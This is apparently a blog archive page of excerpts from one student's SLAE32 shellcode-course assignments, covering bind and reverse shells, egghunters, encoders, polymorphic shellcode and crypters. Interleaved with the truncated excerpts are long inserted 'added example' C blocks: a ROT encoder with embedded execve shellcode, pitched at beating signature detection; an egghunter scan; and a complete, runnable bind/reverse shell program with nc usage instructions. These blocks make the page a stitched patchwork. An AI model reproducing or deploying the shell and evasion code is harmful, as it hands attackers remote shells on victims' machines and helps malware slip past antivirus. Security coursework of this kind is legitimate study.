Posts

Showing posts from July, 2020

SLAE32 - Assignment 7

This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert certification: https://www.pentesteracademy.com/course?id=3

Student ID: PA-15072

All associated code can be found here: https://github.com/pAP3R/public/tree/master/SLAE32/assignments
Crypters

For this assignment, students are tasked with creating a custom shellcode crypter.

Requirements:
Create a custom crypter like the one shown in the "crypters" video
Free to use any existing encryption schema
Can use any programming language

Task 7 was... interesting. By far the most time spent headbanging (to metal and against metal), while also sporting the biggest facepalm.
My original plan was what I ended up with, although it took a detour to get there. For this task I decided to go the AES CBC route: it's a common and easily implemented encryption scheme. Using this article, I was able to come up with a PoC encryption / decryption script pretty quickly. I…

SLAE32 - Assignment 5

This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert certification: https://www.pentesteracademy.com/course?id=3

Student ID: PA-15072

All associated code can be found here: https://github.com/pAP3R/public/tree/master/SLAE32/assignments
Shellcode Analysis

This task requests students to disassemble and analyze at least three shellcode samples created by Metasploit, specifically those under the linux/x86 families. At the time of course creation, the tools msfpayload, msfencode etc. had not yet been combined into msfvenom, which is what I'll obviously use.

Requirements:
Take up at least 3 shellcode samples created using Msfpayload for linux/x86
Use GDB/Ndisasm/Libemu to dissect the functionality of the shellcode
Present your analysis

I decided to perform analysis on the following three payloads:
shell_reverse_tcp (a non-staged reverse shell)
shell_bind_tcp (a non-staged bind shell)
adduser (a payload for adding a user, duh)
Although not the …

SLAE32 - Assignment 6

This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert certification: https://www.pentesteracademy.com/course?id=3

Student ID: PA-15072

All associated code can be found here: https://github.com/pAP3R/public/tree/master/SLAE32/assignments
Polymorphic Shellcodes

Assignment 6 required students to take three shellcodes from Shell-Storm and create polymorphic versions of them.

Requirements:
Take up 3 shellcodes from Shell-Storm and create polymorphic versions of them to beat pattern matching
The polymorphic versions cannot be larger than 150% of the existing shellcode

Shellcode 1: The first shellcode I chose for this assignment was a shellcode which adds an entry to the /etc/hosts file, available here
I like the idea here, as it's a little outside the usual shellcode tactic. It's not 'covert' but it certainly isn't just spawning /bin/bash :shrug The original shellcode is 77 bytes, so it's not huge, especially considering the…

SLAE32 - Assignment 4

This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert certification: https://www.pentesteracademy.com/course?id=3

Student ID: PA-15072

All associated code can be found here: https://github.com/pAP3R/public/tree/master/SLAE32/assignments
Encoders

For this assignment, students were tasked with creating a custom encoding scheme, such as the "Insertion Encoder" from the course.

Requirements:
Create a custom encoding scheme like the “Insertion Encoder”
Write a PoC using execve-stack as the shellcode to encode with your schema and execute

Pretty simple! For this task, I decided to start with a simple ROT cipher, as we're simply trying to avoid signature-based detections. In Python, that might look like this:
>>> input = 1
>>> rotate = 13
>>> out = input + rotate
>>> print(out)
14
That's pretty... expected, haha. Translated to asm, that's still very simple and there's a number of ways…
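The ROT scheme above, carried through in C as an added example (this is not the post's own encoder or decoder stub): it encodes a shellcode blob, decodes it again, and runs the check a practitioner wants before shipping the result, namely that no byte of the encoded blob became 0x00, since a null truncates a payload delivered through a C string. Two assumptions not on the page: the addition wraps modulo 256 as it would in an 8-bit register, and the sample input is the standard 25-byte execve-stack shellcode, embedded here as constructed input. The function names are this example's own.

```c
/* Added example, not the post's code: byte-wise ROT encoder/decoder for
 * x86 shellcode plus the null-byte check. Assumptions: addition wraps mod
 * 256; the sample blob is the standard 25-byte execve("/bin//sh") stack
 * shellcode (constructed input). */
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Constructed sample input: execve-stack, 25 bytes. */
static const uint8_t execve_stack[] = {
    0x31, 0xc0, 0x50, 0x68, 0x2f, 0x2f, 0x73, 0x68, 0x68, 0x2f, 0x62, 0x69,
    0x6e, 0x89, 0xe3, 0x50, 0x89, 0xe2, 0x53, 0x89, 0xe1, 0xb0, 0x0b, 0xcd,
    0x80
};
#define EXECVE_STACK_LEN (sizeof execve_stack)

/* rot_encode: out[i] = (in[i] + rot) mod 256. Returns bytes written. */
size_t rot_encode(const uint8_t *in, size_t n, uint8_t rot, uint8_t *out)
{
    for (size_t i = 0; i < n; i++)
        out[i] = (uint8_t)(in[i] + rot);
    return n;
}

/* rot_decode: inverse of rot_encode; this is the work the asm stub does
 * at runtime before jumping into the decoded bytes. */
size_t rot_decode(const uint8_t *in, size_t n, uint8_t rot, uint8_t *out)
{
    for (size_t i = 0; i < n; i++)
        out[i] = (uint8_t)(in[i] - rot);
    return n;
}

/* has_null: 1 if any byte is 0x00, which would truncate the payload when
 * it is copied as a C string. */
int has_null(const uint8_t *buf, size_t n)
{
    for (size_t i = 0; i < n; i++)
        if (buf[i] == 0x00)
            return 1;
    return 0;
}

/* pick_rot: first rotate value at or after `start` (wrapping, never 0)
 * whose encoding of `in` contains no null byte; -1 if none exists. */
int pick_rot(const uint8_t *in, size_t n, uint8_t start)
{
    for (int k = 0; k < 256; k++) {
        uint8_t r = (uint8_t)(start + k);
        if (r == 0)
            continue;
        int ok = 1;
        for (size_t i = 0; i < n && ok; i++)
            if ((uint8_t)(in[i] + r) == 0x00)
                ok = 0;
        if (ok)
            return r;
    }
    return -1;
}

/* roundtrip_ok: encode then decode and compare; 1 if identical. */
int roundtrip_ok(const uint8_t *in, size_t n, uint8_t rot)
{
    uint8_t enc[256], dec[256];
    if (n > sizeof enc)
        return 0;
    rot_encode(in, n, rot, enc);
    rot_decode(enc, n, rot, dec);
    return memcmp(in, dec, n) == 0;
}

int main(void)
{
    uint8_t enc[EXECVE_STACK_LEN];
    int rot = pick_rot(execve_stack, EXECVE_STACK_LEN, 13);
    if (rot < 0) {
        fprintf(stderr, "no null-free rotate value for this blob\n");
        return 1;
    }
    rot_encode(execve_stack, EXECVE_STACK_LEN, (uint8_t)rot, enc);
    printf("rot = %d, encoded = \"", rot);
    for (size_t i = 0; i < EXECVE_STACK_LEN; i++)
        printf("\\x%02x", enc[i]);
    printf("\"\n");
    return 0;
}
```

With the sample blob a rotate of 13 is already null-free (a byte only becomes 0x00 when it equals 0xf3 before encoding), so pick_rot returns 13; on a blob that does contain 0xf3 it moves on to the next usable value, which is the kind of check the decoder stub cannot do for you at runtime.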

SLAE32 - Assignment 3

This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert certification: https://www.pentesteracademy.com/course?id=3

Student ID: PA-15072

All associated code can be found here: https://github.com/pAP3R/public/tree/master/SLAE32/assignments
Egghunters! Woooo! I love egghunters, I think they're super cool.
There's a lot of information out there on the web about egghunters, and some really good papers too (e.g. Skape). If you're totally unfamiliar and just want the tldr, here's the gist of it:

Let's say you are testing some sort of server application, maybe it's an FTP app. The application has a couple different commands that accept some input, but when you send certain data to one of the commands, the application crashes in a way that allows you to control the flow of execution. "Hooray!" you might be thinking, "Now I can send my payload!"

To your dismay, after sending payload after payload you …
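The search an egghunter performs, written as an added example that is not the post's own hunter: a small in-process scan for two back-to-back copies of a 4-byte tag, returning where the payload starts. The tag "w00t", the constructed "memory" buffer and the function names are this example's assumptions. A real hunter walks the whole address space and has to survive unmapped pages (Skape's paper does this by probing each page with a syscall such as access() before touching it); this version only scans a buffer it already owns, so that part is left out.

```c
/* Added example, not the post's code: the egg search, as a plain scan.
 * Assumptions: 4-byte tag "w00t"; the memory image below is constructed. */
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define EGG_LEN 4

/* find_egg: offset of the first byte after two consecutive copies of `tag`
 * in mem[0..len), or -1 if absent. The egg is doubled so the hunter does
 * not stop on the single copy of the tag that sits inside its own code. */
long find_egg(const uint8_t *mem, size_t len, const uint8_t tag[EGG_LEN])
{
    for (size_t i = 0; i + 2 * EGG_LEN <= len; i++) {
        if (memcmp(mem + i, tag, EGG_LEN) == 0 &&
            memcmp(mem + i + EGG_LEN, tag, EGG_LEN) == 0)
            return (long)(i + 2 * EGG_LEN);
    }
    return -1;
}

/* Constructed "process memory": the hunter's own single copy of the tag
 * (a decoy), filler, then the doubled egg directly followed by a payload. */
static const uint8_t egg_tag[EGG_LEN] = { 'w', '0', '0', 't' };
static const uint8_t fake_memory[] = {
    0x90, 0x90, 'w', '0', '0', 't', 0x90, 0x90, 0x90, /* hunter code, one tag */
    0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,        /* filler */
    'w', '0', '0', 't', 'w', '0', '0', 't',          /* the egg */
    0x31, 0xc0, 0xcd, 0x80                           /* payload (constructed) */
};
#define FAKE_MEMORY_LEN (sizeof fake_memory)

/* payload_offset: where the hunter would land in the constructed buffer,
 * i.e. the index of the first payload byte. */
long payload_offset(void)
{
    return find_egg(fake_memory, FAKE_MEMORY_LEN, egg_tag);
}

int main(void)
{
    long off = payload_offset();
    if (off < 0) {
        puts("egg not found");
        return 1;
    }
    printf("payload starts at offset %ld, first byte 0x%02x\n",
           off, fake_memory[off]);
    return 0;
}
```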

SLAE32 - Assignment 2

This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert certification: https://www.pentesteracademy.com/course?id=3

Student ID: PA-15072

All associated code can be found here: https://github.com/pAP3R/public/tree/master/SLAE32/assignments
TCP_Reverse Shell

Requirements:
Connects to configured IP and port
Execs shell on successful connection
IP and port should be 'easily' configurable

As with the TCP Bind shell from assignment one, I decided the best bet was to write out a reverse shell in C. There's a million resources out there, and the code I came up with is as follows:
/* C reverse shell for SLAE */
#include <unistd.h>
#include <netinet/in.h>
#include <sys/socket.h>
#include <sys/types.h>
#define rhost "127.0.0.1"
#define rport "4444"

int main(int argc, char *argv[])
{
…

SLAE32 - Assignment 1

This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert certification: https://www.pentesteracademy.com/course?id=3

Student ID: PA-15072

All associated code can be found here: https://github.com/pAP3R/public/tree/master/SLAE32/assignments
TCP_Bind Shell

Requirements:
Binds to a port
Executes a shell on incoming connection
Port should be 'easily' configurable

For this assignment, I started like many others and first disassembled Metasploit shellcode. It had the basic principles I expected, but to my dismay it didn't really help me to write my own: MSF's shellcodes are well optimized, so I felt like I'd basically just be copying code, rather than learning to implement it myself. I decided to first write a bind shell in C, as it's low level and I'd be (essentially) making the same calls:
// Shell_bind_tcp
// For SLAE32
// Howard McGreehan
#include <sys/socket.h>
#include <unistd.h>
#include <netinet…
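The C starting point both of these posts describe (assignment 1's bind shell and assignment 2's reverse shell), written out as one added example that is not the author's code: both shells share the same address-building and dup2/execve helper, so the only real difference between them is the socket calls in the middle. Port and IP come from argv, which is what "easily configurable" amounts to in C; the function names, the usage syntax and the choice of /bin/sh are this example's own. The part worth checking before porting to asm is fill_sockaddr: sin_port has to be in network byte order, so 4444 must end up as the bytes 0x11 0x5c, and that is what the test below pins down.

```c
/* Added example, not the post's code: reverse shell and bind shell sharing
 * one helper. Names, argv syntax and /bin/sh are this example's choices. */
#include <arpa/inet.h>
#include <netinet/in.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/socket.h>
#include <unistd.h>

/* fill_sockaddr: build the IPv4 address the syscalls want. sin_port is in
 * network (big-endian) byte order, so 4444 is stored as 0x11 0x5c, exactly
 * the pair of bytes to push in the asm version. Returns 0 on success, -1
 * if `ip` is not a dotted quad. */
int fill_sockaddr(struct sockaddr_in *sa, const char *ip, unsigned short port)
{
    memset(sa, 0, sizeof *sa);
    sa->sin_family = AF_INET;
    sa->sin_port = htons(port);
    return inet_pton(AF_INET, ip, &sa->sin_addr) == 1 ? 0 : -1;
}

/* attach_shell: point stdin/stdout/stderr at the socket, then exec a shell.
 * Only returns on failure. */
static int attach_shell(int fd)
{
    char *const sh_argv[] = { "/bin/sh", NULL };
    for (int i = 0; i < 3; i++)
        if (dup2(fd, i) < 0)
            return -1;
    execve("/bin/sh", sh_argv, NULL);
    return -1;
}

/* reverse_shell: connect out to ip:port and hand that connection a shell. */
int reverse_shell(const char *ip, unsigned short port)
{
    struct sockaddr_in sa;
    int fd;
    if (fill_sockaddr(&sa, ip, port) < 0)
        return -1;
    fd = socket(AF_INET, SOCK_STREAM, 0);
    if (fd < 0)
        return -1;
    if (connect(fd, (struct sockaddr *)&sa, sizeof sa) < 0) {
        close(fd);
        return -1;
    }
    return attach_shell(fd);
}

/* bind_shell: listen on 0.0.0.0:port and give the first client a shell. */
int bind_shell(unsigned short port)
{
    struct sockaddr_in sa;
    int lfd, cfd, one = 1;
    if (fill_sockaddr(&sa, "0.0.0.0", port) < 0)
        return -1;
    lfd = socket(AF_INET, SOCK_STREAM, 0);
    if (lfd < 0)
        return -1;
    setsockopt(lfd, SOL_SOCKET, SO_REUSEADDR, &one, sizeof one);
    if (bind(lfd, (struct sockaddr *)&sa, sizeof sa) < 0 || listen(lfd, 1) < 0) {
        close(lfd);
        return -1;
    }
    cfd = accept(lfd, NULL, NULL);
    close(lfd);
    if (cfd < 0)
        return -1;
    return attach_shell(cfd);
}

int main(int argc, char *argv[])
{
    if (argc == 3 && strcmp(argv[1], "bind") == 0)
        bind_shell((unsigned short)atoi(argv[2]));
    else if (argc == 4 && strcmp(argv[1], "reverse") == 0)
        reverse_shell(argv[2], (unsigned short)atoi(argv[3]));
    else
        fprintf(stderr, "usage: %s bind <port> | reverse <ip> <port>\n", argv[0]);
    return 1;
}
```

Run it as `./shell bind 4444` with `nc 127.0.0.1 4444` on the other side, or start `nc -lvp 4444` first and run `./shell reverse 127.0.0.1 4444`; strace on either path shows the same socket, dup2 and execve sequence the assignments ask you to reproduce by hand.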